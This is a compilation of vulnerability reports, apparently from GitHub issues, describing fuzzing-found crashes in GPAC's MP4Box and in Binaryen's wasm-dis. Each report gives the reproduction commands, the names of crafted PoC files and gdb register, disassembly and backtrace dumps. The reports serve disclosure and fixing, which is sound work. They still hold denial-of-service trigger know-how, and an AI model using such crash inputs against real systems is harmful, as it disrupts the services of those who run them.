A Null Pointer Dereference vulnerability exists in gpac 1.1.0 in the gf_node_get_field function, which can cause a segmentation fault and application crash.

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!

*   I looked for a similar issue and couldn't find any.
*   I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
*   I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop\_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95

Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/

A null pointer dereference was discovered in gf\_node\_get\_field(). The vulnerability causes a segmentation fault and application crash.

**Version:**

    MP4Box - GPAC version 1.1.0-DEV-revUNKNOWN_REV
    (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
            GPAC Filters: https://doi.org/10.1145/3339825.3394929
            GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration:
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D
    

**System information**  
Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz

**command:**

    ./MP4Box -lsr poc_5
    ./MP4Box -lsr poc_6
    

poc.zip

**Result**

poc\_5

    [iso file] Unknown box type dreFF in parent dinf
    [iso file] Missing dref box in dinf
    [iso file] extra box maxr found in hinf, deleting
    [iso file] Unknown box type FFFFFF80 in parent hinf
    [iso file] extra box maxr found in hinf, deleting
    [iso file] Unknown box type 80rak in parent moov
    [iso file] Incomplete box mdat - start 11495 size 860062
    [iso file] Incomplete file while reading for dump - aborting parsing
    [iso file] Unknown box type dreFF in parent dinf
    [iso file] Missing dref box in dinf
    [iso file] extra box maxr found in hinf, deleting
    [iso file] Unknown box type FFFFFF80 in parent hinf
    [iso file] extra box maxr found in hinf, deleting
    [iso file] Unknown box type 80rak in parent moov
    [iso file] Incomplete box mdat - start 11495 size 860062
    [iso file] Incomplete file while reading for dump - aborting parsing
    MPEG-4 LASeR Scene Parsing
    [1]    878696 segmentation fault  ./MP4Box -lsr ./poc/poc_5
    

poc\_6

    [iso file] extra box maxr found in hinf, deleting
    [iso file] extra box maxr found in hinf, deleting
    [iso file] Unknown box type pm00x in parent hinf
    [iso file] Unknown box type 80rak in parent moov
    [iso file] Incomplete box mdat - start 11495 size 861258
    [iso file] Incomplete file while reading for dump - aborting parsing
    [iso file] extra box maxr found in hinf, deleting
    [iso file] extra box maxr found in hinf, deleting
    [iso file] Unknown box type pm00x in parent hinf
    [iso file] Unknown box type 80rak in parent moov
    [iso file] Incomplete box mdat - start 11495 size 861258
    [iso file] Incomplete file while reading for dump - aborting parsing
    MPEG-4 LASeR Scene Parsing
    [LASeR] memory overread - corrupted decoding
    [LASeR] memory overread - corrupted decoding
    [LASeR] memory overread - corrupted decoding
    [LASeR] memory overread - corrupted decoding
    [LASeR] memory overread - corrupted decoding
    [LASeR] memory overread - corrupted decoding
    [LASeR] memory overread - corrupted decoding
    [LASeR] memory overread - corrupted decoding
    [LASeR] memory overread - corrupted decoding
    ...
    Program received signal SIGSEGV, Segmentation fault.
    

**gdb**

poc\_5

    Program received signal SIGSEGV, Segmentation fault.
    0x00007ffff784acf0 in gf_node_get_field () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10
    LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
    ────────────────────────────────────────────[ REGISTERS ]─────────────────────────────────────────────
     RAX  0x4
     RBX  0x5555555df130 —▸ 0x5555555d4330 ◂— 0x0
     RCX  0x5555555df310 ◂— 0x0
     RDX  0x7fffffff7050 ◂— 0x4
     RDI  0x0
     RSI  0x7fffffff7050 ◂— 0x4
     R8   0x4
     R9   0x0
     R10  0x7ffff775bb48 ◂— 'gf_node_get_field'
     R11  0x7ffff784acd0 (gf_node_get_field) ◂— endbr64
     R12  0xfffffffe
     R13  0x5555555df290 ◂— 0x4
     R14  0x7fffffff7050 ◂— 0x4
     R15  0x5555555dcdc0 —▸ 0x5555555d26b0 ◂— 0x0
     RBP  0x80
     RSP  0x7fffffff6fa8 —▸ 0x7ffff7b5784a (lsr_read_command_list+1402) ◂— mov    eax, dword ptr [rsp + 0xa4]
     RIP  0x7ffff784acf0 (gf_node_get_field+32) ◂— mov    rax, qword ptr [rdi]
    ──────────────────────────────────────────────[ DISASM ]──────────────────────────────────────────────
     ► 0x7ffff784acf0 <gf_node_get_field+32>     mov    rax, qword ptr [rdi]
       0x7ffff784acf3 <gf_node_get_field+35>     movzx  eax, word ptr [rax]
       0x7ffff784acf6 <gf_node_get_field+38>     test   ax, ax
       0x7ffff784acf9 <gf_node_get_field+41>     je     gf_node_get_field+144                <gf_node_get_field+144>
        ↓
       0x7ffff784ad60 <gf_node_get_field+144>    mov    eax, 0xffffffff
       0x7ffff784ad65 <gf_node_get_field+149>    ret
    
       0x7ffff784ad66                            nop    word ptr cs:[rax + rax]
       0x7ffff784ad70 <dirty_children>           push   r14
       0x7ffff784ad72 <dirty_children+2>         push   r13
       0x7ffff784ad74 <dirty_children+4>         push   r12
       0x7ffff784ad76 <dirty_children+6>         push   rbp
    ──────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────
    00:0000│ rsp 0x7fffffff6fa8 —▸ 0x7ffff7b5784a (lsr_read_command_list+1402) ◂— mov    eax, dword ptr [rsp + 0xa4]
    01:0008│     0x7fffffff6fb0 ◂— 0x0
    02:0010│     0x7fffffff6fb8 ◂— 0x300000000
    03:0018│     0x7fffffff6fc0 ◂— 0x0
    04:0020│     0x7fffffff6fc8 —▸ 0x5555555df0b0 —▸ 0x5555555df1d0 —▸ 0x5555555df130 —▸ 0x5555555d4330 ◂— ...
    05:0028│     0x7fffffff6fd0 ◂— 0x0
    ... ↓        2 skipped
    ────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────
     ► f 0   0x7ffff784acf0 gf_node_get_field+32
       f 1   0x7ffff7b5784a lsr_read_command_list+1402
       f 2   0x7ffff7b59914 lsr_decode_laser_unit+708
       f 3   0x7ffff7b6204d gf_laser_decode_command_list+333
       f 4   0x7ffff7aa1eb1 gf_sm_load_run_isom+1505
       f 5   0x5555555844a8 dump_isom_scene+760
       f 6   0x55555557b42c mp4boxMain+9228
       f 7   0x7ffff75630b3 __libc_start_main+243
    ──────────────────────────────────────────────────────────────────────────────────────────────────────
    pwndbg> bt
    #0  0x00007ffff784acf0 in gf_node_get_field () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10
    #1  0x00007ffff7b5784a in lsr_read_command_list () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10
    #2  0x00007ffff7b59914 in lsr_decode_laser_unit () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10
    #3  0x00007ffff7b6204d in gf_laser_decode_command_list () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10
    #4  0x00007ffff7aa1eb1 in gf_sm_load_run_isom () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10
    #5  0x00005555555844a8 in dump_isom_scene ()
    #6  0x000055555557b42c in mp4boxMain ()
    #7  0x00007ffff75630b3 in __libc_start_main (main=0x55555556c420 <main>, argc=3, argv=0x7fffffffe188, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe178) at ../csu/libc-start.c:308
    #8  0x000055555556c45e in _start ()
    

poc\_6

    Program received signal SIGSEGV, Segmentation fault.
    0x00007ffff784acf0 in gf_node_get_field () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10
    LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
    ────────────────────────────────────────────[ REGISTERS ]─────────────────────────────────────────────
     RAX  0xbb
     RBX  0x5555555df0f0 —▸ 0x5555555d4300 ◂— 0x0
     RCX  0x5555555df2d0 ◂— 0x0
     RDX  0x7fffffff7000 ◂— 0xbb
     RDI  0x0
     RSI  0x7fffffff7000 ◂— 0xbb
     R8   0xbb
     R9   0x0
     R10  0x7ffff775bb48 ◂— 'gf_node_get_field'
     R11  0x7ffff784acd0 (gf_node_get_field) ◂— endbr64
     R12  0xfffffffe
     R13  0x5555555df250 ◂— 0xbb
     R14  0x7fffffff7000 ◂— 0xbb
     R15  0x5555555dcd80 —▸ 0x5555555d2680 ◂— 0x0
     RBP  0x40
     RSP  0x7fffffff6f58 —▸ 0x7ffff7b5784a (lsr_read_command_list+1402) ◂— mov    eax, dword ptr [rsp + 0xa4]
     RIP  0x7ffff784acf0 (gf_node_get_field+32) ◂— mov    rax, qword ptr [rdi]
    ──────────────────────────────────────────────[ DISASM ]──────────────────────────────────────────────
     ► 0x7ffff784acf0 <gf_node_get_field+32>     mov    rax, qword ptr [rdi]
       0x7ffff784acf3 <gf_node_get_field+35>     movzx  eax, word ptr [rax]
       0x7ffff784acf6 <gf_node_get_field+38>     test   ax, ax
       0x7ffff784acf9 <gf_node_get_field+41>     je     gf_node_get_field+144                <gf_node_get_field+144>
        ↓
       0x7ffff784ad60 <gf_node_get_field+144>    mov    eax, 0xffffffff
       0x7ffff784ad65 <gf_node_get_field+149>    ret
    
       0x7ffff784ad66                            nop    word ptr cs:[rax + rax]
       0x7ffff784ad70 <dirty_children>           push   r14
       0x7ffff784ad72 <dirty_children+2>         push   r13
       0x7ffff784ad74 <dirty_children+4>         push   r12
       0x7ffff784ad76 <dirty_children+6>         push   rbp
    ──────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────
    00:0000│ rsp 0x7fffffff6f58 —▸ 0x7ffff7b5784a (lsr_read_command_list+1402) ◂— mov    eax, dword ptr [rsp + 0xa4]
    01:0008│     0x7fffffff6f60 ◂— 0x6469005453414c00
    02:0010│     0x7fffffff6f68 ◂— 0x900000000
    03:0018│     0x7fffffff6f70 ◂— 0x0
    04:0020│     0x7fffffff6f78 —▸ 0x5555555df070 —▸ 0x5555555df190 —▸ 0x5555555df0f0 —▸ 0x5555555d4300 ◂— ...
    05:0028│     0x7fffffff6f80 ◂— 0x0
    ... ↓        2 skipped
    ────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────
     ► f 0   0x7ffff784acf0 gf_node_get_field+32
       f 1   0x7ffff7b5784a lsr_read_command_list+1402
       f 2   0x7ffff7b59914 lsr_decode_laser_unit+708
       f 3   0x7ffff7b6204d gf_laser_decode_command_list+333
       f 4   0x7ffff7aa1eb1 gf_sm_load_run_isom+1505
       f 5   0x5555555844a8 dump_isom_scene+760
       f 6   0x55555557b42c mp4boxMain+9228
       f 7   0x7ffff75630b3 __libc_start_main+243
    ──────────────────────────────────────────────────────────────────────────────────────────────────────
    pwndbg> bt
    #0  0x00007ffff784acf0 in gf_node_get_field () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10
    #1  0x00007ffff7b5784a in lsr_read_command_list () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10
    #2  0x00007ffff7b59914 in lsr_decode_laser_unit () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10
    #3  0x00007ffff7b6204d in gf_laser_decode_command_list () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10
    #4  0x00007ffff7aa1eb1 in gf_sm_load_run_isom () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10
    #5  0x00005555555844a8 in dump_isom_scene ()
    #6  0x000055555557b42c in mp4boxMain ()
    #7  0x00007ffff75630b3 in __libc_start_main (main=0x55555556c420 <main>, argc=3, argv=0x7fffffffe138, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe128) at ../csu/libc-start.c:308
    #8  0x000055555556c45e in _start ()

CVE-2021-44918: Null Pointer Dereference in gf_node_get_field() · Issue #1968 · gpac/gpac

An infinite loop vulnerability exists in Gpac 1.0.1 in gf_get_bit_size.

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!

*   \[Yes \] I looked for a similar issue and couldn't find any.
*   \[ Yes\] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
*   \[ Yes\] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop\_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95

Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/

**Version:**

    ./MP4Box -version
    MP4Box - GPAC version 1.1.0-DEV-rev1527-g6fcf9819e-master
    (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
     MINI build (encoders, decoders, audio and video output disabled)
    
    Please cite our work in your research:
     GPAC Filters: https://doi.org/10.1145/3339825.3394929
     GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --static-mp4box --prefix=/home/zxq/CVE_testing/sourceproject/gpac/cmakebuild --enable-debug
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_FREETYPE GPAC_HAS_JPEG GPAC_HAS_PNG  GPAC_DISABLE_3D 
    

**System information**  
Ubuntu 20.04.1 LTS, gcc version 9.3.0 (Ubuntu 9.3.0-17ubuntu1~20.04)

**command:**

    ./bin/gcc/MP4Box -hint POC
    

**Result**

\*\*GDB information \*\*

    [----------------------------------registers-----------------------------------]
    RAX: 0x20000 
    RBX: 0x80 
    RCX: 0xe9b05a71 
    RDX: 0x1 
    RSI: 0x6a6a6ab8 
    RDI: 0x6a6a6ab8 
    RBP: 0x5555555e1630 --> 0x1 
    RSP: 0x7fffffff8078 --> 0x7ffff7875506 (<gf_rtp_builder_init+2342>:	mov    ebx,DWORD PTR [rbp+0x90])
    RIP: 0x7ffff7788927 (<gf_get_bit_size+23>:	cmp    eax,edi)
    R8 : 0x0 
    R9 : 0x20 (' ')
    R10: 0x7ffff76d955a ("gf_rtp_builder_init")
    R11: 0x2 
    R12: 0x59e 
    R13: 0x60 ('`')
    R14: 0x5555555e1750 --> 0x0 
    R15: 0x0
    EFLAGS: 0x206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
    [-------------------------------------code-------------------------------------]
       0x7ffff7788920 <gf_get_bit_size+16>:	add    ecx,0x1
       0x7ffff7788923 <gf_get_bit_size+19>:	mov    eax,edx
       0x7ffff7788925 <gf_get_bit_size+21>:	shl    eax,cl
    => 0x7ffff7788927 <gf_get_bit_size+23>:	cmp    eax,edi
       0x7ffff7788929 <gf_get_bit_size+25>:	jle    0x7ffff7788920 <gf_get_bit_size+16>
       0x7ffff778892b <gf_get_bit_size+27>:	mov    eax,ecx
       0x7ffff778892d <gf_get_bit_size+29>:	ret    
       0x7ffff778892e:	xchg   ax,ax
    [------------------------------------stack-------------------------------------]
    0000| 0x7fffffff8078 --> 0x7ffff7875506 (<gf_rtp_builder_init+2342>:	mov    ebx,DWORD PTR [rbp+0x90])
    0008| 0x7fffffff8080 --> 0x24a 
    0016| 0x7fffffff8088 --> 0xfc7 
    0024| 0x7fffffff8090 --> 0x32ce10ac 
    0032| 0x7fffffff8098 --> 0x6a6a6ab800000020 
    0040| 0x7fffffff80a0 --> 0x2 
    0048| 0x7fffffff80a8 --> 0x62 ('b')
    0056| 0x7fffffff80b0 --> 0x5555555dfb90 --> 0x5555555da930 --> 0x0 
    [------------------------------------------------------------------------------]
    Legend: code, data, rodata, value
    Stopped reason: SIGINT
    0x00007ffff7788927 in gf_get_bit_size () from /home/zxq/CVE_testing/sourceproject/momey/gpac/bin/gcc/libgpac.so.10
    gdb-peda$ bt
    #0  0x00007ffff7788927 in gf_get_bit_size () from /home/zxq/CVE_testing/sourceproject/momey/gpac/bin/gcc/libgpac.so.10
    #1  0x00007ffff7875506 in gf_rtp_builder_init () from /home/zxq/CVE_testing/sourceproject/momey/gpac/bin/gcc/libgpac.so.10
    #2  0x00007ffff7a0ec5c in gf_hinter_track_new () from /home/zxq/CVE_testing/sourceproject/momey/gpac/bin/gcc/libgpac.so.10
    #3  0x000055555557958b in HintFile ()
    #4  0x000055555557d257 in mp4boxMain ()
    #5  0x00007ffff74df0b3 in __libc_start_main (main=0x55555556d420 <main>, argc=0x3, argv=0x7fffffffe308, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe2f8)
        at ../csu/libc-start.c:308
    #6  0x000055555556d45e in _start ()
    gdb-peda$

CVE-2021-45297: infinite loop in gf_get_bit_size（） · Issue #1973 · gpac/gpac

A vulnerability exists in GPAC 1.0.1 due to an omission of security-relevant Information, which could cause a Denial of Service. The program terminates with signal SIGKILL.

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!

*   \[Yes \] I looked for a similar issue and couldn't find any.
*   \[ Yes\] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
*   \[ Yes\] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop\_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95

Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/

**Version:**

    ./MP4Box -version
    MP4Box - GPAC version 1.1.0-DEV-rev1527-g6fcf9819e-master
    (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
     MINI build (encoders, decoders, audio and video output disabled)
    
    Please cite our work in your research:
     GPAC Filters: https://doi.org/10.1145/3339825.3394929
     GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --static-mp4box --prefix=/home/zxq/CVE_testing/sourceproject/gpac/cmakebuild --enable-debug
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_FREETYPE GPAC_HAS_JPEG GPAC_HAS_PNG  GPAC_DISABLE_3D 
    

**System information**  
Ubuntu 20.04.1 LTS, gcc version 9.3.0 (Ubuntu 9.3.0-17ubuntu1~20.04)

**command:**

    ./bin/gcc/MP4Box -diso -out /dev/null POC
    

POC.zip  
**Result**

    [iso file] Unknown box type gods in parent moov
    [iso file] Box "avcC" (start 939) has 34 extra bytes
    [iso file] Unknown box type 0000 in parent sinf
    [iso file] Unknown box type u87l  in parent dref
    [iso file] Unknown box type 0001bl in parent minf
    [iso file] Track with no sample table !
    [iso file] Track with no sample description box !
    [iso file] Unknown box type sbgd in parent traf
    [5]    3129116 killed     ./../../../../sourceproject/momey/gpac/bin/gcc/MP4Box -diso -out /dev/null
    
    

GDB Information

    Starting program: /home/zxq/CVE_testing/sourceproject/momey/gpac/bin/gcc/MP4Box -diso id:000001,src:000022+000904,op:splice,rep:32
    [Thread debugging using libthread_db enabled]
    Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
    [iso file] Unknown box type gods in parent moov
    [iso file] Box "avcC" (start 939) has 34 extra bytes
    [iso file] Unknown box type 0000 in parent sinf
    [iso file] Unknown box type u87l  in parent dref
    [iso file] Unknown box type 0001bl in parent minf
    [iso file] Track with no sample table !
    [iso file] Track with no sample description box !
    [iso file] Unknown box type sbgd in parent traf
    
    
    
    
    Program terminated with signal SIGKILL, Killed.
    The program no longer exists.

CVE-2021-45289: Program terminated with signal SIGKILL  · Issue #1972 · gpac/gpac

A Denial of Service vulnerability exists in Binaryen 103 due to an Invalid memory address dereference in wasm::WasmBinaryBuilder::visitLet.

**Version:**

**System information**  
Ubuntu 20.04.1 LTS, clang version 10.0.0-4ubuntu1

**command:**

POC2.zip

**Result**

    [28]    3932046 segmentation fault  ./wasm-dis 
    
    

**GDB information**

    
    Program received signal SIGSEGV, Segmentation fault.
    [----------------------------------registers-----------------------------------]
    RAX: 0x2 
    RBX: 0x7fffffffd390 --> 0x7fffffffd8c0 --> 0x0 
    RCX: 0x0 
    RDX: 0x0 
    RSI: 0xffffffff 
    RDI: 0x7fffffffd390 --> 0x7fffffffd8c0 --> 0x0 
    RBP: 0x7fffffffcf40 --> 0x7fffffffd030 --> 0x7fffffffd0a0 --> 0x7fffffffd100 --> 0x7fffffffd1e0 --> 0x7fffffffd370 (--> ...)
    RSP: 0x7fffffffce90 --> 0x8 
    RIP: 0x7ffff7c1203c (<_ZN4wasm17WasmBinaryBuilder8visitLetEPNS_5BlockE+76>:	mov    rax,QWORD PTR [rdx+0x38])
    R8 : 0x0 
    R9 : 0x0 
    R10: 0x7ffff74d633d ("_ZN4wasm17WasmBinaryBuilder16startControlFlowEPNS_10ExpressionE")
    R11: 0x7ffff7be2080 (<_ZN4wasm17WasmBinaryBuilder16startControlFlowEPNS_10ExpressionE>:	endbr64)
    R12: 0x17 
    R13: 0x55555559ec68 --> 0x1 
    R14: 0x7fffffffcf80 --> 0x7fffffffd038 --> 0x7ffff7c0ba5e (<_ZN4wasm17WasmBinaryBuilder18processExpressionsEv+110>:	mov    rsi,QWORD PTR [rbp-0x60])
    R15: 0x1
    EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
    [-------------------------------------code-------------------------------------]
       0x7ffff7c1202e <_ZN4wasm17WasmBinaryBuilder8visitLetEPNS_5BlockE+62>:	mov    rdx,QWORD PTR [rbx+0x148]
       0x7ffff7c12035 <_ZN4wasm17WasmBinaryBuilder8visitLetEPNS_5BlockE+69>:	mov    rdi,rbx
       0x7ffff7c12038 <_ZN4wasm17WasmBinaryBuilder8visitLetEPNS_5BlockE+72>:	mov    QWORD PTR [r13+0x8],rax
    => 0x7ffff7c1203c <_ZN4wasm17WasmBinaryBuilder8visitLetEPNS_5BlockE+76>:	mov    rax,QWORD PTR [rdx+0x38]
       0x7ffff7c12040 <_ZN4wasm17WasmBinaryBuilder8visitLetEPNS_5BlockE+80>:	sub    rax,QWORD PTR [rdx+0x30]
       0x7ffff7c12044 <_ZN4wasm17WasmBinaryBuilder8visitLetEPNS_5BlockE+84>:	sar    rax,0x3
       0x7ffff7c12048 <_ZN4wasm17WasmBinaryBuilder8visitLetEPNS_5BlockE+88>:	mov    r15,rax
       0x7ffff7c1204b <_ZN4wasm17WasmBinaryBuilder8visitLetEPNS_5BlockE+91>:	mov    QWORD PTR [rbp-0x88],rax
    [------------------------------------stack-------------------------------------]
    0000| 0x7fffffffce90 --> 0x8 
    0008| 0x7fffffffce98 --> 0x7fffffffcf10 --> 0x7fffffffcf80 --> 0x7fffffffd038 --> 0x7ffff7c0ba5e (<_ZN4wasm17WasmBinaryBuilder18processExpressionsEv+110>:	mov    rsi,QWORD PTR [rbp-0x60])
    0016| 0x7fffffffcea0 --> 0x7fffffffd390 --> 0x7fffffffd8c0 --> 0x0 
    0024| 0x7fffffffcea8 --> 0x659c1cad59c48400 
    0032| 0x7fffffffceb0 --> 0x7fffffffd6c0 --> 0x55555558a7c0 --> 0x55555559ec50 --> 0xa ('\n')
    0040| 0x7fffffffceb8 --> 0x7fffffffd390 --> 0x7fffffffd8c0 --> 0x0 
    0048| 0x7fffffffcec0 --> 0x7fffffffd390 --> 0x7fffffffd8c0 --> 0x0 
    0056| 0x7fffffffcec8 --> 0x7ffff76384e1 (<_ZN10MixedArena10allocSpaceEmm+65>:	mov    rbx,rax)
    [------------------------------------------------------------------------------]
    Legend: code, data, rodata, value
    Stopped reason: SIGSEGV
    0x00007ffff7c1203c in wasm::WasmBinaryBuilder::visitLet(wasm::Block*) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so
    gdb-peda$ bt
    #0  0x00007ffff7c1203c in wasm::WasmBinaryBuilder::visitLet(wasm::Block*) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so
    #1  0x00007ffff7c0a742 in wasm::WasmBinaryBuilder::readExpression(wasm::Expression*&) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so
    #2  0x00007ffff7c0ba5e in wasm::WasmBinaryBuilder::processExpressions() () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so
    #3  0x00007ffff7c0bd06 in wasm::WasmBinaryBuilder::readExpression() () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so
    #4  0x00007ffff7c0bec4 in wasm::WasmBinaryBuilder::readGlobals() () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so
    #5  0x00007ffff7c117d0 in wasm::WasmBinaryBuilder::read() () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so
    #6  0x00007ffff7c3d766 in wasm::ModuleReader::readBinaryData(std::vector<char, std::allocator<char> >&, wasm::Module&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >) ()
       from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so
    #7  0x00007ffff7c3df6c in wasm::ModuleReader::readBinary(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, wasm::Module&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so
    #8  0x000055555555966c in main ()
    #9  0x00007ffff6ec50b3 in __libc_start_main (main=0x555555558d40 <main>, argc=0x2, argv=0x7fffffffe248, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe238)
        at ../csu/libc-start.c:308
    #10 0x0000555555559d4e in _start ()
    gdb-peda$ bt
    #0  0x00007ffff7c1203c in wasm::WasmBinaryBuilder::visitLet(wasm::Block*) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so
    #1  0x00007ffff7c0a742 in wasm::WasmBinaryBuilder::readExpression(wasm::Expression*&) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so
    #2  0x00007ffff7c0ba5e in wasm::WasmBinaryBuilder::processExpressions() () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so
    #3  0x00007ffff7c0bd06 in wasm::WasmBinaryBuilder::readExpression() () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so
    #4  0x00007ffff7c0bec4 in wasm::WasmBinaryBuilder::readGlobals() () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so
    #5  0x00007ffff7c117d0 in wasm::WasmBinaryBuilder::read() () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so
    #6  0x00007ffff7c3d766 in wasm::ModuleReader::readBinaryData(std::vector<char, std::allocator<char> >&, wasm::Module&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >) ()
       from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so
    #7  0x00007ffff7c3df6c in wasm::ModuleReader::readBinary(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, wasm::Module&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so
    #8  0x000055555555966c in main ()
    #9  0x00007ffff6ec50b3 in __libc_start_main (main=0x555555558d40 <main>, argc=0x2, argv=0x7fffffffe248, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe238)
        at ../csu/libc-start.c:308
    #10 0x0000555555559d4e in _start ()
    gdb-peda$ 
    #0  0x00007ffff7c1203c in wasm::WasmBinaryBuilder::visitLet(wasm::Block*) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so
    #1  0x00007ffff7c0a742 in wasm::WasmBinaryBuilder::readExpression(wasm::Expression*&) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so
    #2  0x00007ffff7c0ba5e in wasm::WasmBinaryBuilder::processExpressions() () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so
    #3  0x00007ffff7c0bd06 in wasm::WasmBinaryBuilder::readExpression() () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so
    #4  0x00007ffff7c0bec4 in wasm::WasmBinaryBuilder::readGlobals() () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so
    #5  0x00007ffff7c117d0 in wasm::WasmBinaryBuilder::read() () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so
    #6  0x00007ffff7c3d766 in wasm::ModuleReader::readBinaryData(std::vector<char, std::allocator<char> >&, wasm::Module&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >) ()
       from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so
    #7  0x00007ffff7c3df6c in wasm::ModuleReader::readBinary(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, wasm::Module&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so
    #8  0x000055555555966c in main ()
    #9  0x00007ffff6ec50b3 in __libc_start_main (main=0x555555558d40 <main>, argc=0x2, argv=0x7fffffffe248, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe238)
        at ../csu/libc-start.c:308
    #10 0x0000555555559d4e in _start ()

